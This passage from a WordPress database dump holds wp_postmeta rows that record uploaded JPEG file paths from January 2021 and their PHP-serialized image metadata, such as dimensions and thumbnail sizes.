"file\";s:60:\"118031965_312462886864506_7678681092268067942_o-1536x927.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:927;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23650,3444,'_wp_attached_file','2021/01/118036655_312463550197773_1815018273815766510_o.jpg'),(23651,3444,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1913;s:6:\"height\";i:1115;s:4:\"file\";s:59:\"2021/01/118036655_312463550197773_1815018273815766510_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118036655_312463550197773_1815018273815766510_o-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118036655_312463550197773_1815018273815766510_o-1024x597.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118036655_312463550197773_1815018273815766510_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118036655_312463550197773_1815018273815766510_o-768x448.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118036655_312463550197773_1815018273815766510_o-1536x895.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:895;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23652,3445,'_wp_attached_file','2021/01/118037600_312462953531166_7196909441334733590_o.jpg'),(23653,3445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1488;s:6:\"height\";i:1252;s:4:\"file\";s:59:\"2021/01/118037600_312462953531166_7196909441334733590_o.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118037600_312462953531166_7196909441334733590_o-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118037600_312462953531166_7196909441334733590_o-1024x862.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:862;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118037600_312462953531166_7196909441334733590_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118037600_312462953531166_7196909441334733590_o-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23654,3446,'_wp_attached_file','2021/01/118059299_312462780197850_2229825346739181096_n.jpg'),(23655,3446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:509;s:6:\"height\";i:585;s:4:\"file\";s:59:\"2021/01/118059299_312462780197850_2229825346739181096_n.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118059299_312462780197850_2229825346739181096_n-261x300.jpg\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118059299_312462780197850_2229825346739181096_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23656,3447,'_wp_attached_file','2021/01/118074086_312462850197843_2652956027928466277_o.jpg'),(23657,3447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1547;s:6:\"height\";i:1314;s:4:\"file\";s:59:\"2021/01/118074086_312462850197843_2652956027928466277_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118074086_312462850197843_2652956027928466277_o-300x255.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:255;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118074086_312462850197843_2652956027928466277_o-1024x870.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:870;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118074086_312462850197843_2652956027928466277_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118074086_312462850197843_2652956027928466277_o-768x652.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:652;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118074086_312462850197843_2652956027928466277_o-1536x1305.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1305;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23658,3449,'_wp_attached_file','2021/01/118010821_312467090197419_4273034739788428671_o.jpg'),(23659,3449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1713;s:6:\"height\";i:1430;s:4:\"file\";s:59:\"2021/01/118010821_312467090197419_4273034739788428671_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118010821_312467090197419_4273034739788428671_o-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118010821_312467090197419_4273034739788428671_o-1024x855.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:855;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118010821_312467090197419_4273034739788428671_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118010821_312467090197419_4273034739788428671_o-768x641.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118010821_312467090197419_4273034739788428671_o-1536x1282.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1282;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23660,3450,'_wp_attached_file','2021/01/118036651_312467243530737_3520735325747764254_o.jpg'),(23661,3450,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1921;s:6:\"height\";i:1318;s:4:\"file\";s:59:\"2021/01/118036651_312467243530737_3520735325747764254_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118036651_312467243530737_3520735325747764254_o-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118036651_312467243530737_3520735325747764254_o-1024x703.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118036651_312467243530737_3520735325747764254_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118036651_312467243530737_3520735325747764254_o-768x527.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:527;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118036651_312467243530737_3520735325747764254_o-1536x1054.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1054;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23662,3451,'_wp_attached_file','2021/01/118049912_312467376864057_6476498378591711743_o.jpg'),(23663,3451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1629;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118049912_312467376864057_6476498378591711743_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118049912_312467376864057_6476498378591711743_o-300x283.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118049912_312467376864057_6476498378591711743_o-1024x966.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:966;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118049912_312467376864057_6476498378591711743_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118049912_312467376864057_6476498378591711743_o-768x724.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118049912_312467376864057_6476498378591711743_o-1536x1448.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1448;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23664,3452,'_wp_attached_file','2021/01/118072658_312467170197411_1424422127742042449_o.jpg'),(23665,3452,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1687;s:6:\"height\";i:758;s:4:\"file\";s:59:\"2021/01/118072658_312467170197411_1424422127742042449_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118072658_312467170197411_1424422127742042449_o-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118072658_312467170197411_1424422127742042449_o-1024x460.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118072658_312467170197411_1424422127742042449_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118072658_312467170197411_1424422127742042449_o-768x345.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118072658_312467170197411_1424422127742042449_o-1536x690.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23666,3453,'_wp_attached_file','2021/01/118081105_312467290197399_4620837734752160912_o.jpg'),(23667,3453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1780;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118081105_312467290197399_4620837734752160912_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118081105_312467290197399_4620837734752160912_o-300x259.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118081105_312467290197399_4620837734752160912_o-1024x884.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:884;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118081105_312467290197399_4620837734752160912_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118081105_312467290197399_4620837734752160912_o-768x663.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:663;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118081105_312467290197399_4620837734752160912_o-1536x1325.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1325;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23668,3454,'_wp_attached_file','2021/01/118114178_312467406864054_3195001015165433334_o.jpg'),(23669,3454,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1801;s:6:\"height\";i:1135;s:4:\"file\";s:59:\"2021/01/118114178_312467406864054_3195001015165433334_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118114178_312467406864054_3195001015165433334_o-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118114178_312467406864054_3195001015165433334_o-1024x645.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118114178_312467406864054_3195001015165433334_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118114178_312467406864054_3195001015165433334_o-768x484.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118114178_312467406864054_3195001015165433334_o-1536x968.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:968;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23670,3455,'_wp_attached_file','2021/01/118129138_312467320197396_6367962160678170690_o.jpg'),(23671,3455,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118129138_312467320197396_6367962160678170690_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118129138_312467320197396_6367962160678170690_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118129138_312467320197396_6367962160678170690_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118129138_312467320197396_6367962160678170690_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118129138_312467320197396_6367962160678170690_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118129138_312467320197396_6367962160678170690_o-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23672,3456,'_wp_attached_file','2021/01/118139665_312467110197417_509357946596157302_o.jpg'),(23673,3456,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1476;s:6:\"height\";i:1356;s:4:\"file\";s:58:\"2021/01/118139665_312467110197417_509357946596157302_o.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"118139665_312467110197417_509357946596157302_o-300x276.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"118139665_312467110197417_509357946596157302_o-1024x941.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:941;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"118139665_312467110197417_509357946596157302_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"118139665_312467110197417_509357946596157302_o-768x706.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:706;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23674,3457,'_wp_attached_file','2021/01/118247279_312467190197409_8948607088124320484_o.jpg'),(23675,3457,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1428;s:6:\"height\";i:1272;s:4:\"file\";s:59:\"2021/01/118247279_312467190197409_8948607088124320484_o.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118247279_312467190197409_8948607088124320484_o-300x267.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118247279_312467190197409_8948607088124320484_o-1024x912.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:912;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118247279_312467190197409_8948607088124320484_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118247279_312467190197409_8948607088124320484_o-768x684.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23676,3458,'_wp_attached_file','2021/01/118257021_312467133530748_3109687021037286243_o.jpg'),(23677,3458,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1397;s:6:\"height\";i:1410;s:4:\"file\";s:59:\"2021/01/118257021_312467133530748_3109687021037286243_o.jpg\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118257021_312467133530748_3109687021037286243_o-297x300.jpg\";s:5:\"width\";i:297;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"118257021_312467133530748_3109687021037286243_o-1015x1024.jpg\";s:5:\"width\";i:1015;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118257021_312467133530748_3109687021037286243_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118257021_312467133530748_3109687021037286243_o-768x775.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:775;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23678,3459,'_wp_attached_file','2021/01/118319340_312467346864060_1861816488750532017_o.jpg'),(23679,3459,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1699;s:6:\"height\";i:1536;s:4:\"file\";s:59:\"2021/01/118319340_312467346864060_1861816488750532017_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118319340_312467346864060_1861816488750532017_o-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118319340_312467346864060_1861816488750532017_o-1024x926.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:926;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118319340_312467346864060_1861816488750532017_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118319340_312467346864060_1861816488750532017_o-768x694.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:694;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:61:\"118319340_312467346864060_1861816488750532017_o-1536x1389.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1389;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23680,3460,'_wp_attached_file','2021/01/118286420_315769223200539_7870423496580352605_o.jpg'),(23681,3460,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1894;s:6:\"height\";i:994;s:4:\"file\";s:59:\"2021/01/118286420_315769223200539_7870423496580352605_o.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"118286420_315769223200539_7870423496580352605_o-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"118286420_315769223200539_7870423496580352605_o-1024x537.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"118286420_315769223200539_7870423496580352605_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"118286420_315769223200539_7870423496580352605_o-768x403.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:60:\"118286420_